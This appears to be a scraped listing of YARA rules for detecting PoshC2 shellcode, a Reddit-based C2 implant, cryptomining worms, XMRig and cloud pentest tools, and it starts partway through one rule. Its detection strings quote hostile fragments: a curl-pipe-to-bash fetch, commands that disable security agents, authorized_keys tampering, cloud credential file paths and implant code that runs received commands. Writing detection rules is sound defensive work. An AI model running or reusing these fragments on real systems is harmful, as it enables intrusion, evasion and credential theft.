$s17 = "FmN44kQz9yMRZTQKp1UmVFaOdnSSR3THdkSHJDdO5WRT90SSpHZjZVT3NUZwFkWWhlNpJzN04UZpRzLERnTtVGM4JTbyFGeTRXUwgHeyEmWTVlUr8kU4tyL2JnNTZENv"
$s18 = "d0aZ1WOFp1YTRWZ4tUVrN0Q5AVQEV3a3UnV2U0QkR3L3hEU3o3LJFWQnZzdzEUO4hFbBJDTUJGeopkclNjMFJDZ6lHa4o1LUVGShp0cup3L5dWZxpmS11mcix2VV5ERv"
$s19 = "9CNqJmSVRUZjFDR3B1VGhUNZNkQxNmS18WRwpHc2lUYBN1RYNXcntEZWNFeyEzMiRWQr8WOLRVZyg0QiF0QI1Gbr0mZvkmdyxUb4p3Kph2dadGb5EjSRFFdq9WSutydi"
$s20 = "dUb2JDZLdVVvpFe2YVS1lzSvl1MnlGdv92KKZWdWZGahxUaipGWypUeEZ3dyZWONJFTUdjTx5GR4p0KwYXaSZ2dLl2cRxGS4ZWdZFTNvoEeQpWRKJWQahkaTZWcz9iNa"
condition:
uint16(0) == 0x6224 and filesize < 10000KB and 1 of ($x*) and 4 of them
} |
| Details |
Yara rule |
1 |
|
import "hash"
rule PoshC2_Shellcode {
meta:
description = "PoshC2 - Sharp_v2_x64_dll.b64, Sharp_v2_x64_Shellcode.b64, Sharp_v2_x86_dll.b64, Sharp_v2_x86_Shellcode.b64, Sharp_v4_x64_dll.b64, Sharp_v4_x64_Shellcode.b64, Sharp_v4_x86_dll.b64, Sharp_v4_x86_Shellcode.b64"
sha256_1 = "dd654eb75c1f3736d4b5282e7338a5efcbd7481fc7b46ec38a3ff0ea573c408e"
sha256_2 = "cb96cca9101899754efc33859353e0834496a98ee4381b1a9158c7403e1562d2"
sha256_3 = "03c10e261a138666a1c5cf9cb577e8d73e041b1dae0a3d1198d116e4c2b5dec3"
sha256_4 = "04ced8976f86801a23ee5fa1fb33f7cab5638039fb6d2a441a169784ce37adf9"
sha256_5 = "ce950ee11e27e0a95840fa12c878af19910aa82d1ccd5eb99ab99c4131571989"
sha256_6 = "fc454c2453d9cf6b64c0e6ffab76e6f26c584698a454c7cf2e07d96b11a29fb6"
sha256_7 = "ddc5047d6a8bb245644c5385ead8fa0d3b751f2aabf9e88e423e0b9862e65019"
sha256_8 = "f83bbf7318f982ddb457863cf2b45e13c402c2eff5bb1a4d5b8f074295ff46f9"
strings:
$s1 = "QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"
$s2 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
$s3 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
$s4 = "ACAAAAAAAAA"
$s5 = "ABAAAAAAAAA"
$s6 = "AAAADAAAAA"
$s7 = "EAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
$s8 = "AAAABAAAAA"
$s9 = "AbAAAAAAAc"
$s10 = "AAAACAAAAA"
$s11 = "AAAAAAAAAAAAAAAAAAA"
condition:
hash.sha256(0, filesize) == "dd654eb75c1f3736d4b5282e7338a5efcbd7481fc7b46ec38a3ff0ea573c408e" or hash.sha256(0, filesize) == "cb96cca9101899754efc33859353e0834496a98ee4381b1a9158c7403e1562d2" or hash.sha256(0, filesize) == "03c10e261a138666a1c5cf9cb577e8d73e041b1dae0a3d1198d116e4c2b5dec3" or hash.sha256(0, filesize) == "04ced8976f86801a23ee5fa1fb33f7cab5638039fb6d2a441a169784ce37adf9" or hash.sha256(0, filesize) == "ce950ee11e27e0a95840fa12c878af19910aa82d1ccd5eb99ab99c4131571989" or hash.sha256(0, filesize) == "fc454c2453d9cf6b64c0e6ffab76e6f26c584698a454c7cf2e07d96b11a29fb6" or hash.sha256(0, filesize) == "ddc5047d6a8bb245644c5385ead8fa0d3b751f2aabf9e88e423e0b9862e65019" or hash.sha256(0, filesize) == "f83bbf7318f982ddb457863cf2b45e13c402c2eff5bb1a4d5b8f074295ff46f9" or (((uint16(0) == 0x5654 or uint16(0) == 0x4136) and filesize < 600KB and (8 of them)) or (all of them))
} |
| Details |
Yara rule |
1 |
|
import "hash"
rule RedditC2_ImplantUNIX {
meta:
description = "RedditC2 - implant.py"
sha256 = "dba80b543f6d39f2d0631f6cfebef961259746e6f70fb0cf1431e85343ba7d32"
strings:
$s1 = " listener_session = subprocess.getoutput('hostname')" ascii fullword
$s2 = " if(\"in:\" in top_level_comment.body and top_level_comment.id not in self.processed_comments):" ascii fullword
$s3 = " i = Implant(client_id, client_secret, username, password, subreddit, listener_session, user_agent, xor_key)" ascii fullword
$s4 = " output = subprocess.getoutput(command)" ascii fullword
$s5 = " def __init__(self, client_id, client_secret, username, password, subreddit_name, listener_name, user_agent, xor_key):" ascii fullword
$s6 = "def runTask(command):" ascii fullword
$s7 = " ciphertext = \"powershell.exe \" + ciphertext[11:]" ascii fullword
$s8 = "def decrypt(encoded_text, key):" ascii fullword
$s9 = " self.processed_comments.append(top_level_comment.id)" ascii fullword
$s10 = " print(\"[+] Received task to execute: \" + ciphertext)" ascii fullword
$s11 = " self.processed_comments = []" ascii fullword
$s12 = " if(command[:8] == \"download\"):" ascii fullword
$s13 = " user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/"
$s14 = "def encrypt(plaintext, key):" ascii fullword
$s15 = "def xor_encrypt(plaintext, key):" ascii fullword
$s16 = " user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/"
$s17 = " new_comment_body = comment_body.replace('in', 'executed')" ascii fullword
$s18 = " self.subreddit.submit(self.listener_name, selftext=postContent)" ascii fullword
$s19 = "def base64_decode(encoded_text):" ascii fullword
$s20 = " output = runTask(command)" ascii fullword
condition:
hash.sha256(0, filesize) == "dba80b543f6d39f2d0631f6cfebef961259746e6f70fb0cf1431e85343ba7d32" or uint16(0) == 0x6d69 and filesize < 20KB and 8 of them
} |
| Details |
Yara rule |
1 |
|
rule cloud_mining_worm {
meta:
description = "Detects Common Cloud Mining Worms"
author = " [email protected] "
date = "2020-08-16"
license = "Apache License 2.0"
hash1 = "3a377e5baf2c7095db1d7577339e4eb847ded2bfec1c176251e8b8b0b76d393f"
hash2 = "929c3017e6391b92b2fbce654cf7f8b0d3d222f96b5b20385059b584975a298b"
hash3 = "705a22f0266c382c846ee37b8cd544db1ff19980b8a627a4a4f01c1161a71cb0"
strings:
$a = "echo $LOCKFILE | base64 -d > $tmpxmrigfile" ascii wide
$b = "/root/.tmp/xmrig config=/root/.tmp/" ascii wide
$c = "if [ -s /usr/bin/curl ]; then" ascii wide
$d = "echo found: /root/.aws/credentials'" ascii wide
$e = "function KILLMININGSERVICES(){" ascii wide
$g = "touch /root/.ssh/authorized_keys 2>/dev/null 1>/dev/null" ascii wide
$h = "rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service" ascii wide
$i = " [email protected] /root/.ssh/id_ed25519.pub" ascii wide
$j = "echo '0' >/proc/sys/kernel/nmi_watchdog" ascii wide
$k = "curl http://update.aegis.aliyun.com/download/uninstall.sh | bash" ascii wide
$l = "rm -f /var/tmp/kinsing" ascii wide
condition:
filesize < 500KB and any of them
} |
| Details |
Yara rule |
1 |
|
rule cryptomining_malware_xmrig_config {
meta:
description = "Detects XMRig Config File"
author = " [email protected] "
date = "2021-06-28"
license = "Apache License 2.0"
hash1 = "1085c9211f2af8ddf1588adfb150c64c2b3a2b1c7acf4bc445546455f36299c0"
strings:
$ = "\"cpu-affinity\"" ascii wide nocase
$ = "\"autosave\"" ascii wide nocase
$ = "\"log-file\"" ascii wide nocase
$ = "\"max-cpu-usage\"" ascii wide nocase
$ = "\"donate-level\"" ascii wide nocase
$ = "\"huge-pages\"" ascii wide nocase
$ = "\"cpu-priority\"" ascii wide nocase
condition:
filesize < 500KB and 5 of them
} |
| Details |
Yara rule |
1 |
|
rule cryptomining_malware_xmrig {
meta:
description = "Detects XMRig"
author = " [email protected] "
date = "2021-06-28"
license = "Apache License 2.0"
hash1 = "a34ae92c904b60ed7c1dc437493d1b086a828d25c52e5409d2c7b79b880db42f"
strings:
$ = "password for mining server" ascii wide nocase
$ = "threads count to initialize RandomX dataset" ascii wide nocase
$ = "display this help and exit" ascii wide nocase
$ = "maximum CPU threads count (in percentage) hint for autoconfig" ascii wide nocase
$ = "enable CUDA mining backend" ascii wide nocase
$ = "cryptonight" ascii wide nocase
condition:
5 of them
} |
| Details |
Yara rule |
1 |
|
rule pentest_tool_peirates {
meta:
description = "Detects Peirates"
author = " [email protected] "
date = "2021-06-28"
license = "Apache License 2.0"
hash1 = "a0418d568cfe788fe3d2d0558d70fb6d0e7769a2314c58ca04b57cc3225fe532"
strings:
$ = "/var/run/secrets/kubernetes.io/serviceaccount/" ascii wide nocase
$ = "List of comma-seperated Pods" ascii wide nocase
$ = "github.com/aws/aws-sdk-go/service/s3" ascii wide nocase
$ = "S3).ListBucketsRequest" ascii wide nocase
condition:
all of them
} |
| Details |
Yara rule |
1 |
|
rule pentest_tool_kubeletmein {
meta:
description = "Detects kubeletmein"
author = " [email protected] "
date = "2021-06-28"
license = "Apache License 2.0"
hash1 = "112709845dc4ba4edd55747b871542f98ab0307fc8b812fffd5c2a7c3b0801f7"
strings:
$ = "github.com/4armed/kubeletmein" ascii wide nocase
$ = "unable to write kubeconfig file" ascii wide nocase
$ = "now try: kubectl --kubeconfig" ascii wide nocase
$ = "EC2Metadata request" ascii wide nocase
condition:
all of them
} |
| Details |
Yara rule |
1 |
|
rule pentest_tool_dopwn {
meta:
description = "Detects dopwn"
author = " [email protected] "
date = "2021-06-28"
license = "Apache License 2.0"
hash1 = "6fae4c6c34478fb515b8510d14071fc955a13e6bfb93121220342fec866317d1"
strings:
$ = "grab the digitalocean secret and take over the DO account too" ascii wide nocase
$ = "registry/clusterrolebindings" ascii wide nocase
$ = "k8s-ca-cert" ascii wide nocase
condition:
all of them
} |
| Details |
Yara rule |
1 |
|
rule pentest_tool_deepce {
meta:
description = "Detects DeepCE"
author = " [email protected] "
date = "2021-06-28"
license = "Apache License 2.0"
hash1 = ""
strings:
$ = "should be used for authorized penetration testing" ascii wide nocase
$ = "Docker Enumeration, Escalation of Privileges and Container Escapes" ascii wide nocase
$ = "Are we inside kubenetes?" ascii wide nocase
$ = "ip route get 1 | head -1" ascii wide nocase
condition:
all of them
} |
| Details |
Yara rule |
1 |
|
rule suspicious_cloud_credentials {
meta:
description = "Detects file containing a number of cloud credentials"
author = " [email protected] "
date = "2021-06-28"
license = "Apache License 2.0"
hash1 = "b58cf43cb4b000cb63334a8e20ca53e0112037daa178062c876a395092e1d8ca"
strings:
$ = ".aws/credentials" ascii wide nocase
$ = ".config/gcloud/access_tokens.db" ascii wide nocase
$ = ".azure/credentials" ascii wide nocase
condition:
all of them
} |